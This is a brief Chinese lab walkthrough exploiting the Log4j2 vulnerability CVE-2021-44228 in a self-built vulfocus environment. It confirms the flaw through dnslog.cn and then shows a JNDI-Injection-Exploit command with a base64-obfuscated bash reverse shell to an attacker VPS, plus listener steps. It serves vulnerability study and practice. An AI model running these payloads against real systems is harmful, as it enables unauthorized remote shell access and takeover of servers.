log4j2漏洞利用vulfocus-CVE-2021-44228


log4j2-CVE-2021-44228

  漏洞环境是在自己搭建的vulfocus中做的。

打开漏洞环境之后,访问链接。

 他的注入位置在/hello目录下的一个payload位置,并且是get提交的数据。

我们直接访问点击这三个问号,并抓包,我们就可以在这个payload位置注入我们的exp。

 可以在dnslog.cn中获得一个子域名,验证一下是否存在该漏洞。

 这里需要进行url编码一下,要不然返回404。发送,之后就可以在dnslog.cn中看到记录。

 直接利用:用JNDI注入:(远程方法调用)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4xMDAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.100.100

首先要下载这个exp,下载到自己的vps中,敲上面的对应命令,就会返回:下面内容。

在vps中打开一个页面,监听我们的对应的端口。(这里用了监听成功的图)

  之后就直接输入我们的payload。注意这里的rmi,

 vps中就会反弹shell成功。

 途中查看大佬的wp: 膜拜!

https://www.cnblogs.com/loongten/p/15822195.html